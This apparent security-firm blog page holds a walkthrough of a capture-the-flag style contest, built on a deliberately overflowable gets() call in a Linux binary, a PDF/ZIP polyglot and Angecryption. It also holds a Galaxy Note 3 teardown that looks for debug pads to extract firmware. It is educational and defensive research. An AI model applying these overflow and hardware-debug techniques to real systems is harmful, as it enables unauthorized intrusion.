Given the financial drivers, we don't expect a lot of this to change, but we're hopeful we'll one day see a trend towards protecting the user from malware over protecting media companies from users.

In conclusion, we have given a peek behind the trusted veil to show you a piece of how everything works, as well as a few pointers along the way to get you started on your own research.

Hope you enjoyed our travels. Talk to you again soon. 

Go forth and 0day,
n & c

Thursday, July 24

Atredis BlackHat 2014 Contest After Action Report



<Trigger warning: spoilers ahoy! If you’re still playing and don’t want to read it, STOP NOW!>

We had an extra BlackHat pass lying around this year so decided to play a little game to give it away. We figured we’d shoot for a pretty easy challenge, given that we’re so close to the actual conference, so intentionally did a few things to make it easier on you. This is my explanation of how I’d have gone about the challenge, with a few notes along the way about what’s going on under the hood.

Next year, we’ll make it a lot harder, and release it in ~April so people can convince their bosses to buy them cheap airfare to Vegas.

The first three correct answers came in at 1h28m, 1h51m, and 2h00m. Congrats to Cloudchaser, steponequit, and anon!

So, on to the binaries.

When you first download the file at the link, you receive a simple PDF, Contest.pdf.



But wait, there’s more!



The thing with the PDF file format is that it’s extremely forgiving. Its contents go between a header in the first few bytes until it reaches a %%EOF, and will happily allow garbage to be appended to the end.

Conversely, ZIP keeps its “header” at the end of the file, and the standard unzip utility will ignore garbage in front of the real one, so you can simply combine the two files together and readers for both PDF and ZIP file formats will be (mostly) happy.

[Aside: you can stuff the ZIP file in a real PDF object trailing after the EOF marker and gain full PDF compliance, like the PoC||GTFO’s PDFs which are simultaneously ZIPs, PDFs, Truecrypt binaries, Angelic loot fairies, and will even make you a sandwich. Likewise, I’m pretty sure you can tailor the ZIP headerfooter to tell it at what offset the actual ZIP file starts, but #lazy. We didn’t mess with modifying the PDF or ZIP files because they worked fine, other than the warning message shown above in unzip.]

On another note, some folks ran binwalk on the PDF and found the .zip appended to it that way. Not a bad idea.

Yeah yeah, a very simple stage 0, so simple I hesitate to call it anything other than our marketing guy’s attempt to make you look at our logo. (But what a pretty logo it is!) Before I digress too much further, let’s move on.

[stage 1]
Ok, so now we have this new file, bouncilicious. What is it?


Since we’re pretty sure we’re working with a Linux binary, let’s go ahead and switch over to Linux and run it to see what’s up.



So it echoes your favorite song in the world, takes some input, and ends. Is this a super easy challenge that has a ridiculous buffer overflow in it?



Why yes, yes it is! Let’s load it into GDB and take a look.



OK, so we immediately have control of EIP (and EBP). When we ran file, above, it told us the binary still had symbols in it, so what are those?



So either this binary only has three functions in it or the symbols for all the rest were stripped out. The three functions with symbols are blackhat, goto_blackhat, and main.

Huh, I want to goto_blackhat. Do you want to goto blackhat? What happens if we just try to go to it, via gdb? (Or look up its address and stuff it in our input string.)



OK, that naïve idea didn’t work. Let’s back up and take a look at those functions whose symbols weren’t stripped.

[main]



Wow, the assembly in these things is so clean. It’s almost like someone disabled all gcc optimization to make it easily readable. That someone must be a nice guy, or a guy I hate, because he made this too easy.

Here, we have main loading some variables on the stack and making a call to mmap. IDA helpfully told us its args, so we know it’s mmap’ing a 0x1000 byte region near 0x24242424 (we’re having mmap automatically page align for us) with some flags.

Assuming mmap doesn’t fail, it goes here:

Which copies 0x13 bytes from goto_blackhat to the value stored in EAX, which was 0x24242424 (“$$$$”). OK, so we know that goto_blackhat is copied to 0x24242424. Let’s save that knowledge for later.

Looking at sub_0804A9FA we can see _gets is called with absolutely no checking, and an overflow occurs.
.text:0804A9FA                 push    ebp
.text:0804A9FB                 mov     ebp, esp
.text:0804A9FD                 sub     esp, 28h
.text:0804AA00                 mov     dword ptr [esp], offset a31myoILlTellYo ; "\x1B[31mYo, I'll tell you what I want, "...
.text:0804AA07                 call    _printf
.text:0804AA0C                 lea     eax, [ebp+s]
.text:0804AA0F                 mov     [esp], eax      ; s
.text:0804AA12                 call    _gets
.text:0804AA17                 leave
.text:0804AA18                 retn
[Note: I think one solver didn’t notice the BOF and just patched the binary to bounce everywhere needed in the binary to solve this challenge. Word.]

So let’s take a look at the function that was copied to 0x24242424.

[goto_blackhat]



Here, we can see it simply loads the address for blackhat and jumps to it. Moving onwards…

[blackhat]

And so now we land at blackhat, which has this check in the first chunk of code:
<snipped: prologue, set up the stack>
<snipped: call a couple of functions>
<snipped: load some strings into variables>

.text:0804A8F1                 mov     eax, ebp
.text:0804A8F3                 add     eax, 4
.text:0804A8F6                 mov     eax, [eax]
.text:0804A8F8                 cmp     eax, 24242424h
.text:0804A8FD                 jz      short loc_804A917
.text:0804A8FF                 mov     dword ptr [esp], offset s ; "Oops, that's not the money shot! You ne"...
.text:0804A906                 call    _puts
.text:0804A90B                 mov     dword ptr [esp], 1 ; status
.text:0804A912                 call    _exit
This is the part of the code that implements the error message shown above. Here, don’t scroll back up, I’ll paste it again:



To understand what’s being compared against 0x24242424 at 0x0804A8F8, you have to backtrack from the value stored at [EAX] at 0x0804A8F6, which is the value stored at [EBP+4]. Right after the overflow, leave/retn pops 0x24242424 into both EBP and EIP, gaining execution flow. In goto_blackhat's prologue, EBP is pushed to the stack, fixed with a valid EBP (ESP was not under user control via this path) and then the code jmp's to blackhat.

In blackhat, then, the address from the time of the overflow that's now on the stack is dereferenced and compared against 0x24242424. As such, if you didn't stuff this value on the stack yourself, or modify EBP prior to hitting goto_blackhat, Do Not Pass Go and the application quits.

Regardless, from talking to folks who completed the challenge, many (most?) people didn’t know what was actually being compared here, and just made an educated (or uneducated) guess to bypass this check or nop’d the check or patched the jump or swapped the eflag, which is basically what was intended at the outset anyway. (Note to self: if you’re trying to be sneaky, don’t implement your sneakiness in a fashion that gives people the info they need to just guess and bypass the whole damn check without understanding what it’s doing.)

Moving on, if your EBP was correct at the time goto_blackhat was called, it outputs those strings that were loaded at the beginning of the function:



… and then falls into these two loops down here:



For now, you can ignore what this does, other than that it calls _write with some data. (And if you’re really perceptive, you’ll notice it wrote to FD 2, which is STDERR.)
.text:0804A9A4                 mov     [esp+4], eax       ; buf
.text:0804A9A8                 mov     dword ptr [esp], 2 ; fd
.text:0804A9AF                 call    _write
[Note: we considered several ways to hide the goto_blackhat mmap/memcpy, stripping everything, inlining everything, forcing you to ROP or change memory permissions yourself, dynamically generating the two echoed values, seeding the decryption routine with EBP, etc. Marketing put the kibosh on that, as there was concern no one would spend the time to solve it before BH actually arrived. Plus, only malware reversers (and warez scenesters) would figure it out, and there are too many of you at BH already. ☺ We hope you enjoyed this easier version.] [Just kidding, we love you all.]

[Another Note: This big loop does some relatively simple decryption of the embedded buffer from a relatively nasty key computed with two modified SHA1 hashes with a non-standard TEA and other ridiculousness. We had one solver who RE’d these functions and manually decrypted the buffer. Basically, the key generation part was fixed in code with no seeds from process state, so grabbing that key and then manually decrypting was not hard once you saw what it was doing.]

Ok, so we need our EBP to be 0x24242424, and we saw in main, earlier, that the bounce function goto_blackhat was copied to 0x24242424, so our input string is really easy. Dolla dolla billz, yo:



When you press enter, it dumps a bunch of binary data to STDERR, stage 2.



[stage 2]

Great, another PDF.



This brilliant haiku is a hat tip to our wonderful neighbors over at PoC||GTFO, specifically their 3rd edition that was released a couple of months ago. When you track it down, you’ll find a fantastic article on Angecryption, which is a way to create a binary that, when encrypted with a specific key and IV, generates a new file.

[Several people got stuck here. They briefly skimmed the angecryption article and just tried to decrypt the PDF (or the garbage at the end of the PDF) with the key/IV values given at the end of [stage 1]. Angecryption is madness because you don’t decrypt to get the plaintext, but encrypt it. I heartily recommend you go read that (and all other) PoC||GTFO articles over at any of the mirrors, such as http://openwall.info/wiki/people/solar/pocorgtfo.]

Googling for Angecryption, you’ll find the googlecode site hosting it (which contains an example encryption python script), or you could have just read the paper and done the encryption by hand:



This dumps yet another PDF:



…and this time it’s simply a wrapper for a zip file containing an mp3. (As currently written, Angecryption only supports a few filetypes, and we didn’t mess with implementing a zip or mp3 file; we simply reused the same PDF+ZIP file trick we used at the beginning.)



This mp3 instructed you to email us at a supersecret address, but I won’t tell you, just in case anyone else still wants to play along.

N

Monday, April 28

Making a 1st Impression with Hardware

Fluffy Introduction Text

I get the “What exactly do you do for a living?” question fairly often, and tend to generically toss out a canned response of “hacker” or “information security professional” or “computers” depending on the person asking and whether or not I’m being questioned by a customs official with a gun and a surly look. I thought it might be fun to blog up a example or two of what we actually do for a paycheck, as it might help explain our niche inside a niche industry and maybe illuminate where our customer’s money goes and what value we provide.

For this exploration, let us focus on 2 random devices sitting on my desk this weekend: The Samsung Galaxy Note 3 (specifically the SM-9005 variant) and the often misunderstood and slightly obscure Samsung Anyway S102.

For the Note 3, I’ll detail what a teardown looks like to me and why it matters to the customer. The device is fairly well documented on the internet, so a full and complete hardware reverse engineering analysis probably isn't worth the time. As such, I’ll just focus on the high level overview. Consider this my first couple of hours on a project, simply what I look for and what my plan of attack would be. This teardown will disregard software and the USB stack entirely, and just be a glance at the hardware.

After the SM-9005, I’ll walk through a deeper analysis of the S102. I expect this to be quite interesting and fun, though it will be a separate post that will go up within the next couple of weeks.

So, without further ado….

The Samsung Galaxy Note 3 (SM-9005) Teardown


With any common mobile platform that crosses my desk for analysis, I start with a quick perusal of iFixIt for a teardown. For the Note III, we find this: <iFixIt Link>

The device is fairly straight forward to crack open, but the public teardown doesn’t tell us much about the internals. We can fix this with a bit more time on google and quickly run into the beloved chipworks.com tear down (we will come back to this later): <ChipWorks Link>

While the overall information is nice, what we really care about here is:
  • What components are being used (ChipWorks gave us a listing already)
  • How was the device built
  • Did the designers leave any debugging mechanisms exposed or active during production
  • Are there any weak or squishy portions of the design that look easily exploitable
So with the background we have at hand, it’s time to take a screwdriver to the phone and see what’s inside for ourselves.

A GENERIC TEARDOWN PHOTO
A GENERIC TEARDOWN PHOTO
Taking a closer look at the main PCB, we see all the same components and latch plugs that the other tear-downs exposed. We also get a first pass understanding of the device complexity and it’s general craftsmanship, and in this case the Samsung engineers design stays true to form with a clean and well structured PCB. All the components are well placed and the overall view is aesthetically uncluttered. We can quickly see the camera in the center, as well as the SIM card slot and the battery connector. The large chip below and to the right of the camera is the main slab of NAND Flash on the device. The other components we will revisit after we finish our “lay of the land” exploration.

TOP OF THE PCB
TOP OF THE PCB
Further analysis of the phone shows the case connections are just as cleanly laid out. Typically there is little of interest on the case and screen sides of a phone, but on the Note 3 we can see a handful of interaction points that drive the screen and touch sensors underneath the PCB. The small silicon on the right (below the headphone jack) is the Synaptics S5050A touch screen controller. If the interest of this project was to manipulate user interaction points, this would be our starting place. Aside from the controller and the pads on the left, there is little on the screen side but dense connection cables, and these tend to be easier to explore on the main PCB.

SCREEN SIDE OF THE CASE, UNDER PCB
SCREEN SIDE OF THE CASE, UNDER PCB
Our last view of the entire PCB will be from the bottom. This is where our main SoC (system on a chip) is hiding, along with a collection of other interesting components.

Starting with the top left corner, we can see where the PCB contacts the pressure connection pads on the case that I mentioned before. I this were a real project I would eventually explore them with a multimeter to be sure, but my initial assumption is that these simply share power and ground with the screen.

Moving to the top, we can see the 4 pins that connect to the battery when the phone is assembled, and to the right of that is our main slab of RAM followed by 2 sets of RF Shielded components.

BOTTOM OF THE MAIN PCB
BOTTOM OF THE MAIN PCB
If you didn’t notice, I did a bit of “it’s magic” handwaving when locating the SoC (it’s hiding underneath the slab of RAM). We know this because we googled the device and ChipWorks already discovered this for us and they tell us it is the new Snapdragon 800 (MSM8974). Had this not ben the case, I would have to start desoldering components looking for Qualcomm silicon. While cleaning a PCB of all components gives me great joy, this phone was a present and I’d like to at least boot it once before we kill it, so we will take the ChipWorks finding as gospel for the time being.

So far, our analysis is far from special or unique. iFixIt delves to this level trying to help people fix or replace broken components on a phone and ChipWorks delves a bit deeper looking for new hardware and trends in the engineering space. At this level, we also diverge, but our path is to catalogue hardware interaction points and to explore the PCB for potential debug interfaces.

Jumping down the stack a bit


Now, before we delve much deeper, it’s probably a good idea to spin up a quick vernacular, especially if you are not experienced in hardware. First, modern PCBs are typically dense and multi-layered. As such, a simple visual inspection is not always going to grant you 100% understanding as we can’t see internal sandwiched layers from the top or bottom. Phones and high end consumer electronics are especially dense, while more esoteric hardware still tends to be dual layer (top and bottom only).

When wanting to connect a trace between layers, a via is used. These are simply the “dots” you see from visual inspection and they generally mean that a trace has jumped to another layer (though they can be use for other things as well, like pulling a reference voltage or ground signal from a different layer).

Lastly, when PCBs are being mass produced they need to be tested prior to deployment. While a multitude of options are available, the majority of devices we look at in the real world still support the concept of a “bed of nails”. <insert google image search results here>. This concept basically means that interesting or problematic areas of the board have testing points exposed on the outer layers of the PCB so that an external testing machine can quickly validate them on the production line. Furthermore, my favorite hardware designers tend to expose debug functionality with these interaction points to allow for firmware and OS flashing post production.

Now that we are loaded with a simplified lexicon, we can delve a bit deeper into some closeup photos of the SM-9005 board.

The first thing I notice upon glancing at the PCB is the bed of nails pads lying about the board (these are the copper / gold circles in the below picture). If this wasn’t a Samsung device and I had not spent countless days tracing prior hardware revisions of these pads, I would be really excited. I’d immediately start tracing the pads with a multimeter and tapping them with a logic analyzer to explore what they are exposing. Given the target though, we will wait on that task until the S102A analysis (where I expect much more interesting results).

BED OF NAILS PADS AND CABLE SEAT
BED OF NAILS PADS AND CABLE SEAT
The other thing to take note of in this picture is the wonderfully large spacing of leads off the ribbon cable seat. These pinouts, while still fairly tight and small, are spaced far enough apart that latching with a logic analyzer to watch all the data pass over the cable is an approachable task and much easier than tapping the cables directly. If we cared about PCB to Screen interactions, this would be our starting point.

While we will disregard the bed of nails pads because I’ve explored Samsung phones in the past and know better, I do see something on the board that makes me second guess that  decision. Below, you will see a collection of unpopulated pads that are designed to seat standard capacitors and resistors. Seeing these gets me quite excited, especially because some of the traces end in nail pads as well.

You will rarely see PCB layouts with truly unused components, everything about physical hardware is about tradeoffs between space, cost, usability and mass production. Engineers don't simply design and produce extra unused pads as a rule, so if they are on production equipment they probably have a function.

UNPOPULATED PADS
UNPOPULATED PADS
In reality, these are probably laid out to support the different hardware variants that Samsung utilizes around the world. In this manner, the designers can lay out a single PCB and mass produce it instead of full redesigns for each variant of the hardware that is to ship. The factory would then populate the board with different component sets depending on whether or not the phone was to be an AT&T LTE device or something else.

Aside from the logical, these pads could expose something immensely more interesting: hardware debugging and firmware manipulation. At some point in production, the device must be loaded with software and most common SoC vendors protect that functionality with a series of hardware flags controlled by resident voltages. In this case, I would start tracing the pads with a multimeter to see where the missing discrete components would effect, and what circuit they could complete if bridged.

We have seen hardware of a lower mass production scale where through hole resistors were utilized to open the SoC for firmware debugging and then simply clipped by hand before the final device closure and shipment to customers. If my target was to acquire Qualcomm firmware or debug the resident NAND, these pads would be my starting point. Further enticing me along this path is the mysterious pads exposed directly next to the SoC / RAM stack (as seen below).

PADS ALONG THE MAIN SOC / RAM
PADS ALONG THE MAIN SOC / RAM

Final Thoughts

While we’ve meandered around a bit without real focus, I do hope I’ve explained a bit about what I look for in a teardown and what excites me to see. If this were a real engagement to find security related issues on the Note 3, I would be tracing all the pins and attempting to recreate the full PCB schematic. I would then acquire spec sheets for every piece of silicon I could and start looking for debug or flashing capabilities. The main focus of this part of a hardware analysis is to plan an attack to grab the resident firmware and the Note 3 exposes a couple of paths that while probably dead ends are none the less worth running down.

We would also explore the USB side of this hardware and obviously look at the driver/os/kernel as well, but I think I’ll save those walkthroughs for an easier device and another time / blog post.

Thanks for reading,

m0nk

if you have any questions, please email us or find us on twitter @m0nk_dot / @Atredis